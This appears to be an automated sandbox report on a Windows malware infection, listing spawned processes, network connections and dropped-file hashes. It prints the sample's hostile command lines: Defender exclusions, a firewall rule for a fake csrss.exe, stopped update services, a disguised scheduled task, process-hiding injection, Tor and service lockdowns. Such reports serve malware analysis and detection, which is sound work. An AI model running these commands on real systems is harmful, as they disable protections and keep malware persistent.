powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1DA5.exe

C:\Users\Admin\AppData\Local\Temp\1DA5.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\5560.exe

C:\Users\Admin\AppData\Local\Temp\5560.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\79F0.exe

C:\Users\Admin\AppData\Local\Temp\79F0.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,15695620666788156348,15262721334961648107,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8604 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\NextSink\dbxkj\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\dbxkj\TypeId.exe

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\NextSink\dbxkj\TypeId.exe

C:\Users\Admin\AppData\Local\NextSink\dbxkj\TypeId.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 52.3.28.207:443 www.epicgames.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 98.49.222.23.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 207.28.3.52.in-addr.arpa udp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 151.101.1.21:443 www.paypal.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 129.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 113.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
NL 199.232.148.159:443 abs.twimg.com tcp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 t.co udp
US 104.244.42.194:443 api.twitter.com tcp
US 8.8.8.8:53 video.twimg.com udp
NL 199.232.148.159:443 pbs.twimg.com tcp
US 104.244.42.197:443 t.co tcp
NL 199.232.148.158:443 video.twimg.com tcp
US 8.8.8.8:53 159.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 197.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
NL 199.232.148.159:443 pbs.twimg.com tcp
NL 199.232.148.159:443 pbs.twimg.com tcp
NL 199.232.148.159:443 pbs.twimg.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.22:443 i.ytimg.com tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 157.240.5.10:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 22.36.251.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 10.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.paypalobjects.com udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 tracking.epicgames.com udp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 54.205.234.65:443 tracking.epicgames.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 176.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 105.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 65.234.205.54.in-addr.arpa udp
US 8.8.8.8:53 153.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
US 157.240.5.35:443 facebook.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 104.244.42.194:443 api.twitter.com tcp
US 104.244.42.194:443 api.twitter.com tcp
US 8.8.8.8:53 fbcdn.net udp
US 157.240.5.35:443 fbcdn.net tcp
US 8.8.8.8:53 c.paypal.com udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 fbsbx.com udp
US 192.55.233.1:443 tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
NL 172.217.168.227:443 www.recaptcha.net udp
RU 5.42.92.190:80 5.42.92.190 tcp
US 194.49.94.72:80 tcp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 8.8.8.8:53 t.paypal.com udp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 104.18.41.136:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 c6.paypal.com udp
NL 142.250.179.194:443 googleads.g.doubleclick.net tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
NL 142.250.179.194:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 rr5---sn-aigl6nsd.googlevideo.com udp
GB 74.125.105.42:443 rr5---sn-aigl6nsd.googlevideo.com tcp
US 8.8.8.8:53 42.105.125.74.in-addr.arpa udp
GB 74.125.105.42:443 rr5---sn-aigl6nsd.googlevideo.com tcp
GB 74.125.105.42:443 rr5---sn-aigl6nsd.googlevideo.com tcp
GB 74.125.105.42:443 rr5---sn-aigl6nsd.googlevideo.com tcp
GB 74.125.105.42:443 rr5---sn-aigl6nsd.googlevideo.com tcp
GB 74.125.105.42:443 rr5---sn-aigl6nsd.googlevideo.com tcp
US 8.8.8.8:53 login.steampowered.com udp
NL 23.222.49.98:443 login.steampowered.com tcp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 api.steampowered.com udp
NL 23.222.49.98:443 api.steampowered.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 90.219.19.104.in-addr.arpa udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 api.hcaptcha.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 5.42.92.190:80 5.42.92.190 tcp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 udp
US 194.49.94.11:80 tcp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
IT 185.196.9.161:80 185.196.9.161 tcp
US 8.8.8.8:53 161.9.196.185.in-addr.arpa udp
RU 185.174.136.219:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 194.49.94.11:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 41.18.21.104.in-addr.arpa udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
RU 5.42.92.51:19057 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
BG 91.92.247.247:39001 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 247.247.92.91.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 transfer.sh udp
US 104.21.18.41:80 bluepablo.fun tcp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 server3.theupdatetime.org udp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 188.114.96.0:443 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 104.21.18.41:80 bluepablo.fun tcp
GB 89.191.217.1:9001 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 1.217.191.89.in-addr.arpa udp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
RU 195.10.205.16:1056 tcp
DE 217.160.247.34:9002 tcp
DE 141.95.0.54:9001 tcp
US 194.49.94.11:80 tcp
US 8.8.8.8:53 34.247.160.217.in-addr.arpa udp
US 8.8.8.8:53 54.0.95.141.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 172.217.168.234:443 jnn-pa.googleapis.com tcp
NL 172.217.168.234:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 234.168.217.172.in-addr.arpa udp
RU 5.42.92.51:19057 tcp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.36.6:443 static.doubleclick.net tcp
DE 217.160.247.34:9002 tcp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eE3ax78.exe

MD5 2afedf2ae13e1263b6240b3bb427cce9
SHA1 4014e15ccf40be5d57d8f2f67a8fc37d9d51e3c9
SHA256 73be77cd94202a35aeacf75a8a42504a84245d09708f2badb932343a1729114f
SHA512 e7805b3c68a87da16756b0dc68046775e05fffaef054178d699e4d9635f7d8399f85ea1b3acc22dc0fa458f11c012d3164c2ab59d827d254598798f371540415

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\eE3ax78.exe

MD5 2afedf2ae13e1263b6240b3bb427cce9
SHA1 4014e15ccf40be5d57d8f2f67a8fc37d9d51e3c9
SHA256 73be77cd94202a35aeacf75a8a42504a84245d09708f2badb932343a1729114f
SHA512 e7805b3c68a87da16756b0dc68046775e05fffaef054178d699e4d9635f7d8399f85ea1b3acc22dc0fa458f11c012d3164c2ab59d827d254598798f371540415

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rz8Kg03.exe

MD5 bbfac611a8ead10cf51abdb5a06d9d6a
SHA1 b3a682aebe4b96451c7c926c60b734943f2a23e8
SHA256 53b446c978b8d932e77b78f705e556ee54738cb8dd69eb0fe126efbecbd6371e
SHA512 17ad341dc5eff6ead96005bafe7c467b1f88559e73d3bf4d75d48628ee8a219787b5c443303b70e697d4b8bca115cd3abb4d2a8316db9bb48fb9be022beb10d5

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rz8Kg03.exe

MD5 bbfac611a8ead10cf51abdb5a06d9d6a
SHA1 b3a682aebe4b96451c7c926c60b734943f2a23e8
SHA256 53b446c978b8d932e77b78f705e556ee54738cb8dd69eb0fe126efbecbd6371e
SHA512 17ad341dc5eff6ead96005bafe7c467b1f88559e73d3bf4d75d48628ee8a219787b5c443303b70e697d4b8bca115cd3abb4d2a8316db9bb48fb9be022beb10d5

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QX18Tq3.exe

MD5 61a729a48cc8e50d760518ffcb052775
SHA1 bd8c5e1c538652284faafe9204acf230779bac95
